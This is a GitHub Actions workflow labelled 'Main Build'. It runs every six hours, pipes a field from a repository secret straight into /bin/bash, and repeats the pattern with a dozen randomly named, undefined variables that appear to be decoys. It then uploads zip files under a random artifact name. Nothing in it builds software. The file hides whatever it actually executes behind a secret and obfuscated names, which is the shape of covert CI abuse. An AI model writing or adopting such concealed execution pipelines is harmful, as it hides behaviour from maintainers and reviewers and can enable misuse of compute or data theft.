name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '29 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          qlm2: ${{ secrets.qlm2 }}
        run: |
          printf '%s' "$qlm2" | jq -r .dzqj6 | /bin/bash
          printf '%s' "$dtndp0" | jq -r .wvpkw14 | /bin/bash
          printf '%s' "$det2" | jq -r .cl836 | /bin/bash
          echo $vy85 | jq -r .is5 | /bin/bash
          echo $xdtse23 | jq -r .nfwbh918 | /bin/bash
          echo $l172 | jq -r .rrtot8242 | /bin/bash
          printf '%s' "$ss5169" | jq -r .qgzch09642 | /bin/bash
          echo $zbyo01820 | jq -r .ebb33 | /bin/bash
          printf '%s' "$b4410" | jq -r .hwntm9572 | /bin/bash
          echo $qp7 | jq -r .w76426 | /bin/bash
          echo $sr45928 | jq -r .g6 | /bin/bash
          printf '%s' "$oayzn20" | jq -r .xoakx69764 | /bin/bash
          echo $ksz940 | jq -r .a25631 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: WduamQch
          path: "*.zip"
          retention-days: 1
